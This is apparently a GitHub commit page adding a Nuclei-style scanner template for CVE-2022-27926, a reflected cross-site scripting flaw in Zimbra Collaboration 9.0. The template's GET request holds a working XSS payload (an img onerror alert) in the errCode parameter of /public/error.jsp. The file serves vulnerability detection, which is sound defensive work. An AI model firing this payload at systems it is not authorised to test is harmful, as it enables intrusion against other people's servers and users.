Create CVE-2022-27926.yaml

patch-1
Prince Chaddha 2023-04-13 18:02:48 +05:30 committed by GitHub
parent 5ffdd65882
commit 095f057f4c
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 32 additions and 0 deletions

View File

@ -0,0 +1,32 @@
id: CVE-2022-27926
info:
name: Zimbra Collaboration (ZCS) - Cross Site Scripting
author: rootxharsh,iamnoooob,pdresearch
severity: medium
description: |
A reflected cross-site scripting (XSS) vulnerability in the /public/launchNewWindow.jsp component of Zimbra Collaboration (aka ZCS) 9.0 allows unauthenticated attackers to execute arbitrary web script or HTML via request parameters.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2022-27926
- https://wiki.zimbra.com/wiki/Security_Center
- https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P24
- https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-27926
cwe-id: CWE-79
epss-score: 0.01319
cpe: cpe:2.3:a:zimbra:collaboration:9.0.0:-:*:*:*:*:*:*
tags: cve,cve2022,zimbra,xss,kev
requests:
- method: GET
path:
- "{{BaseURL}}/public/error.jsp?errCode=%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E"
matchers:
- type: word
part: body
words:
- '<title>"><img src=x onerror=alert(document.domain)> - ???">'